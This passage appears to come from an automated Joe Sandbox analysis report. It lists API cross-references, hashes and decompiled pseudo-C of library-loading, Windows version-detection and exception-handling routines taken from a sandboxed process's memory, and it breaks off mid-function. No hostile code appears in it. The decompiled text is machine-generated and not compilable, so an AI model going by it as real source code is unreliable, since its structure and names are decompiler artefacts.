0x00cd13b5
0x00cd13b5
0x00000000
0x00cd13ab
0x00cd13a9
0x00cd13be
0x00cd13c0
0x00cd13c4
0x00cd13c6
0x00cd13c8
0x00cd13d3
0x00cd13d3
0x00cd13c8
0x00cd13d7
0x00cd13d9
0x00cd13e0
0x00cd13e5
0x00cd13e5
0x00cd13f1
0x00cd13fc
0x00cd13ff
0x00cd1405
0x00cd1407
0x00cd1409
0x00cd140c
0x00cd1414
0x00cd141a
0x00cd1421
0x00cd1426
0x00cd1429
0x00cd142b
0x00cd142b
0x00cd1432
0x00cd1437
0x00cd1448
0x00cd12a8
0x00cd12a8
0x00cd12ac
0x00cd12ae
0x00cd12b0
0x00cd12b0
0x00cd12ba
0x00cd12c0
0x00cd12c2
0x00cd130f
0x00cd1313
0x00cd131e
0x00cd131e
0x00000000
0x00cd12c4
0x00cd12c4
0x00cd12c6
0x00cd12cc
0x00cd12ce
0x00cd12d3
0x00cd12db
0x00cd12e1
0x00cd12e8
0x00cd12f0
0x00cd12f2
0x00cd12f2
0x00cd12f9
0x00cd12fe
0x00cd1308
0x00cd1308
0x00cd12c2
0x00cd1451
0x00cd145a
0x00cd1463
0x00cd1465
0x00cd1473

APIs

LoadLibraryExW.KERNEL32(?,00000000,00001100,00000000,?,?,?,00000000), ref: 00CD12BA
GetLastError.KERNEL32(?,?,?,00000000), ref: 00CD1315
LoadLibraryW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 00CD13B8
GetLastError.KERNEL32(?,00000000,?,?,?,00000000), ref: 00CD13CA

Strings

LoadNativeLibraryHelper, xrefs: 00CD1231, 00CD1260
kernel32.dll, xrefs: 00CD148E
..\..\base\native_library_win.cc, xrefs: 00CD122C, 00CD125B
AddDllDirectory, xrefs: 00CD1499

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLastLibraryLoad
String ID: ..\..\base\native_library_win.cc$AddDllDirectory$LoadNativeLibraryHelper$kernel32.dll
API String ID: 3568775529-1484654216
Opcode ID: 300e7c895009bd621f83baeac163727ead0983aeac2ebee602cfffa3ff979d2f
Instruction ID: f65d9a842a0e1e870ed0d027efae41c435d1b2d04f1d8ff3c06402b2e907a4e2
Opcode Fuzzy Hash: 300e7c895009bd621f83baeac163727ead0983aeac2ebee602cfffa3ff979d2f
Instruction Fuzzy Hash: 96B1F771A04341AFC710DF28D885B6AB7E1AF84750F18462DFE9597391EB70EA44C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2290 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 329
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00CC2290(signed char* __ecx, void* __fp0, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v24;
				signed char _v29;
				signed char _v32;
				signed char _v36;
				char _v37;
				signed short _v40;
				signed char _v44;
				signed char _v45;
				signed char _v48;
				intOrPtr _v52;
				signed char _v53;
				char _v56;
				char _v60;
				signed char _v61;
				signed char _v65;
				signed char _v68;
				signed int _v72;
				signed short _v76;
				signed int __ebx;
				void* __edi;
				void* __esi;
				signed int _t130;
				struct HINSTANCE__* _t133;
				void* _t138;
				signed char _t148;
				signed int _t153;
				signed int _t160;
				_Unknown_base(*)()* _t175;
				void* _t178;
				signed int _t179;
				signed char _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t186;
				char _t189;
				signed char _t193;
				intOrPtr _t195;
				signed char _t200;
				void* _t210;
				signed char _t213;
				signed char* _t214;
				signed int _t215;
				signed char* _t217;
				signed int _t218;
				signed int _t219;
				void* _t221;
				void* _t222;
				void* _t230;
				void* _t241;
				void* _t242;
				void* _t243;

				_t221 = (_t219 & 0xfffffff8) - 0x40;
				_t217 = __ecx;
				_t130 =  *0xd40014; // 0xfbddd969
				_v24 = _t130 ^ _t218;
				 *__ecx = 0;
				asm("xorps xmm0, xmm0");
				asm("movups [ecx+0x20], xmm0");
				__ecx[0x34] = 0;
				__ecx[0x30] = 0;
				_t210 = GetCurrentProcess();
				_t133 = GetModuleHandleW(L"api-ms-win-core-wow64-l1-1-1.dll");
				_t180 = 5;
				if(_t133 != 0) {
					_t175 = GetProcAddress(_t133, "IsWow64Process2");
					if(_t175 != 0) {
						_v48 = 0xffff;
						_v60 = 0xffff;
						 *0xd57000();
						_t206 =  &_v48;
						_t178 =  *_t175(_t210,  &_v48,  &_v60);
						_t180 = 5;
						if(_t178 != 0) {
							_t179 = _v72 & 0x0000ffff;
							if(_t179 > 0x1ff) {
								__eflags = _t179 - 0x200;
								if(__eflags == 0) {
									_t180 = 2;
								} else {
									__eflags = _t179 - 0xaa64;
									if(__eflags == 0) {
										_t180 = 4;
									} else {
										__eflags = _t179 - 0x8664;
										if(__eflags != 0) {
											goto L12;
										} else {
											_t180 = 1;
										}
									}
								}
							} else {
								_t9 = _t179 - 0x1c0; // 0xfe3f
								_t230 = _t9 - 4;
								if(_t230 > 0) {
									L11:
									_t180 = 0;
									__eflags = _t179 - 0x14c;
									if(__eflags != 0) {
										L12:
										_t180 = 5;
									}
								} else {
									_t206 = 0x15;
									asm("bt edx, ecx");
									if(_t230 >= 0) {
										goto L11;
									} else {
										_t180 = 3;
									}
								}
							}
						}
					}
				}
				_t217[0x38] = _t180;
				asm("movaps xmm0, [0xd33ab0]");
				asm("movups [esi+0x48], xmm0");
				_t217[0x58] = 0;
				_t186 = _a4;
				_t13 = _t186 + 4; // 0x0
				_t217[4] =  *_t13;
				_t15 = _t186 + 8; // 0x0
				_t217[8] =  *_t15;
				_t17 = _t186 + 0xc; // 0x0
				_t217[0xc] =  *_t17;
				_v36 = 0;
				_v44 = 0;
				_v48 = 0;
				_v40 = 0;
				_v60 = 0xffffffff;
				_v56 = 0xffffffff;
				_v52 = 0xffffffff;
				E00CD1610( &_v60);
				_t138 = E00CD1630( &_v60, _t206, _t230, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 1);
				_t189 = 0;
				_t207 = 0;
				_t231 = _t138;
				if(_t138 == 0) {
					E00CD1720( &_v60, _t231, L"UBR",  &_v36);
					E00CD17E0( &_v60, 0, _t231, L"DisplayVersion",  &_v56);
					_t207 = _v53 & 0x000000ff;
					_t189 = _v60;
					_t173 =  <  ? _t189 : _t207;
					_t233 =  <  ? _t189 : _t207;
					if(( <  ? _t189 : _t207) == 0) {
						E00CD17E0( &_v60, _t207, _t233, L"ReleaseId",  &_v56);
						_t207 = _v45 & 0x000000ff;
						_t189 = _v52;
					}
				}
				_t140 =  >=  ?  &_v48 : _v48;
				_t209 =  <  ? _t189 : _t207 & 0x000000ff;
				E00CBF8A0( &_v72,  >=  ?  &_v48 : _v48,  <  ? _t189 : _t207 & 0x000000ff);
				_t222 = _t221 + 0xc;
				_t213 = _v36;
				_v76 = _v72;
				_v32 = _v68;
				_v29 = _v65;
				_t181 = _v61 & 0x000000ff;
				E00CD16D0( &_v60);
				if(_v37 < 0) {
					L00CFDBEC(_v48);
					_t222 = _t222 + 4;
				}
				_t217[0x10] = _t213;
				if(_t217[0x2b] < 0) {
					_t51 =  &(_t217[0x20]); // 0x20
					L00CFDBEC( *_t51);
					_t222 = _t222 + 4;
				}
				_t217[0x20] = _v76;
				_t217[0x24] = _v32;
				_t217[0x27] = _v29;
				_t217[0x2b] = _t181;
				_t193 = _t217[4];
				_t148 = 0x15;
				if(_t193 == 0xb) {
					_t182 = _a4;
				} else {
					_t182 = _a4;
					if(_t193 != 0xa) {
						_t148 = 0x16;
						__eflags = _t193 - 6;
						if(__eflags <= 0) {
							_t209 = _t217[8];
							if(__eflags != 0) {
								_t148 = 0;
								__eflags = _t209;
								if(_t209 != 0) {
									__eflags = _t193 - 5;
									if(_t193 == 5) {
										__eflags = _t209 - 1;
										_t148 = 2 - (0 | _t209 == 0x00000001);
									}
								}
							} else {
								__eflags = _t209;
								if(_t209 == 0) {
									_t148 = 3;
								} else {
									__eflags = _t209 - 2;
									if(_t209 == 2) {
										_t148 = 5;
									} else {
										__eflags = _t209 - 1;
										if(_t209 != 1) {
											_t148 = 6;
										} else {
											_t148 = 4;
										}
									}
								}
							}
						}
					} else {
						_t200 = _t217[0xc];
						if(_t200 <= 0x55ef) {
							_t148 = 0x14;
							if(_t200 <= 0x4f7b) {
								_t148 = 0x13;
								_t241 = _t200 - 0x4a63;
								if(_t241 <= 0) {
									_t148 = 0x12;
									if(_t241 != 0) {
										_t148 = 0x11;
										_t242 = _t200 - 0x4a61;
										if(_t242 <= 0) {
											_t148 = 0x10;
											if(_t242 != 0) {
												_t148 = 0xf;
												_t243 = _t200 - 0x47ba;
												if(_t243 <= 0) {
													_t148 = 0xe;
													if(_t243 != 0) {
														_t148 = 0xd;
														if(_t200 <= 0x4562) {
															_t148 = 0xc;
															if(_t200 <= 0x42ed) {
																_t148 = 0xb;
																if(_t200 <= 0x3faa) {
																	_t148 = 0xa;
																	if(_t200 <= 0x3ad6) {
																		_t148 = 9;
																		if(_t200 <= 0x3838) {
																			_t148 = 7;
																			asm("sbb eax, 0xffffffff");
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *_t217 = _t148;
				E00CC2770(_t182, _t217, GetCurrentProcess());
				_t63 = _t182 + 0x114; // 0x0
				_t217[0x18] =  *_t63 & 0x0000ffff;
				_t65 = _t182 + 0x116; // 0x0
				_t217[0x1c] =  *_t65 & 0x0000ffff;
				_t183 = _t182 + 0x14;
				if(_t182 + 0x14 == 0) {
					_t153 = 0;
					__eflags = 0;
				} else {
					_t153 = E00D133D4(_t183);
					_t222 = _t222 + 4;
				}
				_t67 =  &(_t217[0x2c]); // 0x2c
				_t214 = _t67;
				E00CBF8A0( &_v48, _t183, _t153);
				if(_t217[0x37] < 0) {
					L00CFDBEC( *_t214);
				}
				_t214[8] = _v40;
				asm("movsd xmm0, [esp+0x20]");
				asm("movsd [edi], xmm0");
				_t215 = _a8;
				_t217[0x3c] =  *(_t215 + 0x14);
				_t217[0x44] =  *(_t215 + 0x1c);
				_t217[0x40] = L00CC1FC0(_t209);
				_t195 = _a4;
				_t79 = _t195 + 4; // 0x0
				_t160 =  *_t79;
				if(_t160 == 5) {
					_t84 = _t195 + 8; // 0x0
					_t160 =  *_t84;
					__eflags = _t160 - 1;
					if(_t160 == 1) {
						__eflags =  *(_t195 + 0x119) & 0x00000002;
						if(( *(_t195 + 0x119) & 0x00000002) != 0) {
							goto L64;
						} else {
							goto L63;
						}
					} else {
						__eflags = _t160 - 2;
						if(_t160 != 2) {
							goto L64;
						} else {
							__eflags =  *((char*)(_t195 + 0x11a)) - 1;
							if( *((char*)(_t195 + 0x11a)) != 1) {
								L55:
								__eflags =  *((short*)(_t195 + 0x118));
								if( *((short*)(_t195 + 0x118)) < 0) {
									goto L64;
								} else {
									goto L56;
								}
							} else {
								_t209 = _t215;
								__eflags =  *_t215 - 9;
								if( *_t215 == 9) {
									goto L63;
								} else {
									goto L55;
								}
							}
						}
					}
					goto L65;
				} else {
					if(_t160 == 0xa || _t160 == 6) {
						_t160 = _a12 - 1;
						if(_t160 > 0xca) {
							goto L64;
						} else {
							switch( *((intOrPtr*)(_t160 * 4 +  &M00D33BDC))) {
								case 0:
									L63:
									_t217[0x14] = 1;
									goto L65;
								case 1:
									goto L64;
								case 2:
									_t217[0x14] = 3;
									goto L65;
								case 3:
									L56:
									_t217[0x14] = 2;
									goto L65;
								case 4:
									 *(__esi + 0x14) = 4;
									goto L65;
								case 5:
									 *(__esi + 0x14) = 5;
									goto L65;
								case 6:
									L78:
									asm("movq xmm0, [esp+0x20]");
									asm("movq [esi+0x8], xmm0");
									goto L87;
								case 7:
									L80:
									__ecx =  &_v48;
									__eax = L00CC2C70(__ebx,  &_v48, __edi, __eflags, _v72);
									goto L87;
								case 8:
									L81:
									__ecx =  *(__esi + 0x24);
									__eax = E00CD4810( *(__esi + 0x24), __edx, __fp0, _v48, _v40);
									goto L87;
								case 9:
									L82:
									__ecx =  *(__esi + 0x2c);
									__eax = E00CD5030( *(__esi + 0x2c), __fp0, _v48, _v40);
									goto L87;
								case 0xa:
									L83:
									asm("movq xmm0, [esp+0x20]");
									asm("movq [esi+0x10], xmm0");
									goto L87;
								case 0xb:
									L84:
									__ecx =  *(__esi + 0x28);
									__eax = L00CD4C90( *(__esi + 0x28), __fp0, _v48, _v40);
									goto L87;
								case 0xc:
									L85:
									__ecx =  *(__esi + 0x30);
									__eax = E00CD5410( *(__esi + 0x30), __fp0, _v48, _v40);
									goto L87;
								case 0xd:
									L86:
									__ecx =  *(__esi + 0x34);
									__eax = E00CD5720( *(__esi + 0x34), __edx, __fp0, _v48, _v40);
									while(1) {
										L87:
										__ecx = __ebx;
										__eax = E00C97468(__ebx, __edi);
										asm("movdqu xmm0, [esp+0x10]");
										asm("movdqa [esp+0x20], xmm0");
										__ecx = _v40 & 0x0000ffff;
										__eflags = __cx;
										if(__cx == 0) {
											break;
										}
										__eflags = __cx - 8;
										if(__cx <= 8) {
											0 = 1;
											__eax = 1 << __cl;
											_t100 = __esi + 0x44;
											 *_t100 =  *(__esi + 0x44) | 1 << __cl;
											__eflags =  *_t100;
										}
										__eax = __cx & 0x0000ffff;
										__eax = (__cx & 0x0000ffff) - 1;
										__eflags = __eax - 7;
										if(__eflags > 0) {
											__ecx =  &_v48;
											__eax = L00C96D54(__ebx,  &_v48, __edx, __fp0, _v68);
										} else {
											switch( *((intOrPtr*)(__eax * 4 +  &M00D33F08))) {
												case 0:
													goto L78;
												case 1:
													goto L80;
												case 2:
													goto L81;
												case 3:
													goto L82;
												case 4:
													goto L83;
												case 5:
													goto L84;
												case 6:
													goto L85;
												case 7:
													goto L86;
											}
										}
									}
									__eax = _v16;
									__eflags = __eax - _v12;
									__ebx = __ebx & 0xffffff00 | __eax == _v12;
									__ecx = _v8;
									__ecx = _v8 ^ __ebp;
									__eflags = __ecx;
									0 = __ebx;
									__esp =  &_v16;
									return __ebx;
									goto L89;
							}
						}
					} else {
						L64:
						_t217[0x14] = 0;
						L65:
						E00CFE643(_t160, _t183, _v24 ^ _t218, _t209, _t215, _t217);
						return _t217;
					}
				}
				L89:
			}

0x00cc2299
0x00cc229c
0x00cc229e
0x00cc22a5
0x00cc22a9
0x00cc22af
0x00cc22b2
0x00cc22b6
0x00cc22bd
0x00cc22ca
0x00cc22d1
0x00cc22d7
0x00cc22de
0x00cc22ea
0x00cc22f2
0x00cc22fa
0x00cc2301
0x00cc2308
0x00cc2312
0x00cc2319
0x00cc231b
0x00cc2322
0x00cc2324
0x00cc232e
0x00cc234c
0x00cc2351
0x00cc2378
0x00cc2353
0x00cc2353
0x00cc2358
0x00cc237f
0x00cc235a
0x00cc235a
0x00cc235f
0x00000000
0x00cc2361
0x00cc2361
0x00cc2361
0x00cc235f
0x00cc2358
0x00cc2330
0x00cc2330
0x00cc2336
0x00cc2339
0x00cc2368
0x00cc2368
0x00cc236a
0x00cc236f
0x00cc2371
0x00cc2371
0x00cc2371
0x00cc233b
0x00cc233b
0x00cc2340
0x00cc2343
0x00000000
0x00cc2345
0x00cc2345
0x00cc2345
0x00cc2343
0x00cc2339
0x00cc232e
0x00cc2322
0x00cc22f2
0x00cc2384
0x00cc2387
0x00cc238e
0x00cc2392
0x00cc2399
0x00cc239c
0x00cc239f
0x00cc23a2
0x00cc23a5
0x00cc23a8
0x00cc23ab
0x00cc23ae
0x00cc23b6
0x00cc23be
0x00cc23c6
0x00cc23ce
0x00cc23d6
0x00cc23de
0x00cc23ec
0x00cc23ff
0x00cc2404
0x00cc2406
0x00cc240b
0x00cc240d
0x00cc241f
0x00cc2430
0x00cc2435
0x00cc243c
0x00cc2442
0x00cc2445
0x00cc2447
0x00cc2453
0x00cc2458
0x00cc245d
0x00cc245d
0x00cc2447
0x00cc246b
0x00cc2471
0x00cc247b
0x00cc2480
0x00cc2483
0x00cc248b
0x00cc2493
0x00cc249b
0x00cc249f
0x00cc24a8
0x00cc24b2
0x00cc24b8
0x00cc24bd
0x00cc24bd
0x00cc24c0
0x00cc24c7
0x00cc24c9
0x00cc24ce
0x00cc24d3
0x00cc24d3
0x00cc24da
0x00cc24e5
0x00cc24e8
0x00cc24eb
0x00cc24ee
0x00cc24f1
0x00cc24f9
0x00cc25c0
0x00cc24ff
0x00cc2502
0x00cc2505
0x00cc25c5
0x00cc25ca
0x00cc25cd
0x00cc26b8
0x00cc26bb
0x00cc2711
0x00cc2713
0x00cc2715
0x00cc271b
0x00cc271e
0x00cc2726
0x00cc2731
0x00cc2731
0x00cc271e
0x00cc26bd
0x00cc26bd
0x00cc26bf
0x00cc274a
0x00cc26c5
0x00cc26c5
0x00cc26c8
0x00cc2754
0x00cc26ce
0x00cc26ce
0x00cc26d1
0x00cc275e
0x00cc26d7
0x00cc26d7
0x00cc26d7
0x00cc26d1
0x00cc26c8
0x00cc26bf
0x00cc26bb
0x00cc250b
0x00cc250b
0x00cc2514
0x00cc251a
0x00cc2525
0x00cc252b
0x00cc2530
0x00cc2536
0x00cc253c
0x00cc2541
0x00cc2547
0x00cc254c
0x00cc2552
0x00cc2554
0x00cc2559
0x00cc255b
0x00cc2560
0x00cc2566
0x00cc2568
0x00cc256d
0x00cc256f
0x00cc257a
0x00cc257c
0x00cc2587
0x00cc2589
0x00cc2594
0x00cc2596
0x00cc25a1
0x00cc25a3
0x00cc25ae
0x00cc25b6
0x00cc25bb
0x00cc25bb
0x00cc25ae
0x00cc25a1
0x00cc2594
0x00cc2587
0x00cc257a
0x00cc256d
0x00cc2566
0x00cc2559
0x00cc2552
0x00cc2541
0x00cc2536
0x00cc2525
0x00cc2514
0x00cc2505
0x00cc25d3
0x00cc25de
0x00cc25e3
0x00cc25ea
0x00cc25ed
0x00cc25f4
0x00cc25f7
0x00cc25fa
0x00cc2607
0x00cc2607
0x00cc25fc
0x00cc25fd
0x00cc2602
0x00cc2602
0x00cc2609
0x00cc2609
0x00cc2613
0x00cc261f
0x00cc2623
0x00cc2628
0x00cc262f
0x00cc2632
0x00cc2638
0x00cc263c
0x00cc2642
0x00cc2648
0x00cc2650
0x00cc2653
0x00cc2656
0x00cc2656
0x00cc265c
0x00cc2687
0x00cc2687
0x00cc268a
0x00cc268d
0x00cc26e1
0x00cc26e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc268f
0x00cc268f
0x00cc2692
0x00000000
0x00cc2694
0x00cc2694
0x00cc269b
0x00cc26a5
0x00cc26a5
0x00cc26ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc269d
0x00cc269d
0x00cc269f
0x00cc26a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc26a3
0x00cc269b
0x00cc2692
0x00000000
0x00cc265e
0x00cc2661
0x00cc266f
0x00cc2675
0x00000000
0x00cc2677
0x00cc2677
0x00000000
0x00cc26ea
0x00cc26ea
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc267e
0x00000000
0x00000000
0x00cc26af
0x00cc26af
0x00000000
0x00000000
0x00cc2738
0x00000000
0x00000000
0x00cc2741
0x00000000
0x00000000
0x00cc306e
0x00cc306e
0x00cc3074
0x00000000
0x00000000
0x00cc308d
0x00cc308d
0x00cc3095
0x00000000
0x00000000
0x00cc309c
0x00cc309c
0x00cc30a7
0x00000000
0x00000000
0x00cc30ae
0x00cc30ae
0x00cc30b9
0x00000000
0x00000000
0x00cc30c0
0x00cc30c0
0x00cc30c6
0x00000000
0x00000000
0x00cc30cd
0x00cc30cd
0x00cc30d8
0x00000000
0x00000000
0x00cc30df
0x00cc30df
0x00cc30ea
0x00000000
0x00000000
0x00cc30f1
0x00cc30f1
0x00cc30fc
0x00cc3101
0x00cc3101
0x00cc3101
0x00cc3104
0x00cc3109
0x00cc310f
0x00cc3115
0x00cc311a
0x00cc311d
0x00000000
0x00000000
0x00cc3050
0x00cc3054
0x00cc3058
0x00cc3059
0x00cc305b
0x00cc305b
0x00cc305b
0x00cc305b
0x00cc305e
0x00cc3061
0x00cc3062
0x00cc3065
0x00cc307e
0x00cc3086
0x00cc3067
0x00cc3067
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc3067
0x00cc3065
0x00cc3123
0x00cc3127
0x00cc312b
0x00cc312e
0x00cc3132
0x00cc3132
0x00cc3139
0x00cc313b
0x00cc3142
0x00000000
0x00000000
0x00cc2677
0x00cc26f3
0x00cc26f3
0x00cc26f3
0x00cc26fa
0x00cc2700
0x00cc270e
0x00cc270e
0x00cc2661
0x00000000

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,0000011C,00000000,?,00CC2117,0000011C,00D46A38,00000000), ref: 00CC22C4
GetModuleHandleW.KERNEL32(api-ms-win-core-wow64-l1-1-1.dll,?,?,?,?,?,?,?,?,00000000,0000011C,00000000,?,00CC2117,0000011C,00D46A38), ref: 00CC22D1
GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 00CC22EA
GetCurrentProcess.KERNEL32 ref: 00CC25D5

Strings

IsWow64Process2, xrefs: 00CC22E4
ReleaseId, xrefs: 00CC244E
UBR, xrefs: 00CC241A
api-ms-win-core-wow64-l1-1-1.dll, xrefs: 00CC22CC
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00CC23F5
DisplayVersion, xrefs: 00CC242B

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CurrentProcess$AddressHandleModuleProc
String ID: DisplayVersion$IsWow64Process2$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR$api-ms-win-core-wow64-l1-1-1.dll
API String ID: 1114296175-236569533
Opcode ID: 549e107935158869bdfd056d95b313efaf7e32c9a1ce95eaacb9c082e2c5865d
Instruction ID: 1187b5a13cfee26d3d993c20e842632fccbcc11a1c329b16fcee926748712206
Opcode Fuzzy Hash: 549e107935158869bdfd056d95b313efaf7e32c9a1ce95eaacb9c082e2c5865d
Instruction Fuzzy Hash: 40C113706083419BEB24CF18C594B6BB7E4EF84314F14492EF9968B390DB78DE85DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D145C4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00D145C4(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t147;
				signed int _t153;
				void* _t156;
				signed char _t161;
				signed int _t162;
				void* _t164;
				void* _t167;
				void* _t170;
				signed char _t177;
				intOrPtr* _t182;
				void* _t185;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				signed int _t191;
				void* _t195;
				void* _t200;
				void* _t201;
				intOrPtr _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t214;
				signed int _t215;
				intOrPtr _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t223;
				signed int _t228;
				signed int _t229;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t220 = __edx;
				_t222 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t208 = L00D20E2B(_a8, _a16, _t222);
				_t238 = _t237 + 0xc;
				_v12 = _t208;
				if(_t208 < 0xffffffff || _t208 >= _t222[1]) {
					L66:
					E00D0E930(_t206, _t208, _t220, _t222, _t229);
					asm("int3");
					__eflags = _v88;
					_push(_t206);
					_t207 = _v92;
					_push(_t229);
					_push(_t222);
					_t223 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t207);
						_push(_t223);
						_push(_v0);
						E00D1452B(_t207, _t223, _t229, __eflags);
						_t238 = _t238 + 0x10;
					}
					_t147 = _a36;
					__eflags = _t147;
					if(_t147 == 0) {
						_t147 = _t223;
					}
					E00CFF630(_t208, _t147, _v0);
					_t230 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t223);
					L00D13E4C(_t207, _t208, _t220, _t223, _a28, __eflags);
					L00D20E48(_t223, _a16,  *((intOrPtr*)(_t230 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t207 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t223);
					_push(_v0);
					_t153 = L00D13F76(_t207, _t220, _t223, _t230, __eflags);
					__eflags = _t153;
					if(_t153 != 0) {
						E00CFF600(_t153, _t223);
						return _t153;
					}
					return _t153;
				} else {
					_t206 = _a4;
					if( *_t206 != 0xe06d7363 ||  *((intOrPtr*)(_t206 + 0x10)) != 3 ||  *((intOrPtr*)(_t206 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t206 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t206 + 0x14)) != 0x19930522) {
						L22:
						_t220 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t229 = 0;
						if( *((intOrPtr*)(_t206 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t156 = L00D13D51(_t206, _t208, _t220, _t222, 0);
							if( *((intOrPtr*)(_t156 + 0x10)) == 0) {
								L60:
								return _t156;
							} else {
								_t206 =  *((intOrPtr*)(L00D13D51(_t206, _t208, _t220, _t222, 0) + 0x10));
								_t195 = L00D13D51(_t206, _t208, _t220, _t222, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t195 + 0x14));
								if(_t206 == 0 ||  *_t206 == 0xe06d7363 &&  *((intOrPtr*)(_t206 + 0x10)) == 3 && ( *((intOrPtr*)(_t206 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t206 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t206 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t206 + 0x1c)) == _t229) {
									goto L66;
								} else {
									if( *((intOrPtr*)(L00D13D51(_t206, _t208, _t220, _t222, _t229) + 0x1c)) == _t229) {
										L23:
										_t220 = _v8;
										_t208 = _v12;
										L24:
										_v52 = _t222;
										_v48 = 0;
										__eflags =  *_t206 - 0xe06d7363;
										if( *_t206 != 0xe06d7363) {
											L56:
											__eflags = _t222[3];
											if(_t222[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													E00D149EE(_t208, _t220, _t222, _t229, _t206, _a8, _t220, _a16, _t222, _t208, _a28, _a32);
													_t238 = _t238 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t206 + 0x10)) - 3;
											if( *((intOrPtr*)(_t206 + 0x10)) != 3) {
												goto L56;
											} else {
												__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t206 + 0x14)) == 0x19930520) {
													L29:
													_t229 = _a32;
													__eflags = _t222[3];
													if(_t222[3] > 0) {
														E00CFF590(_t208,  &_v68,  &_v52, _t208, _a16, _t222, _a28);
														_t220 = _v64;
														_t238 = _t238 + 0x18;
														_t182 = _v68;
														_v44 = _t182;
														_v16 = _t220;
														__eflags = _t220 - _v56;
														if(_t220 < _v56) {
															_t214 = _t220 * 0x14;
															__eflags = _t214;
															_v32 = _t214;
															do {
																_t215 = 5;
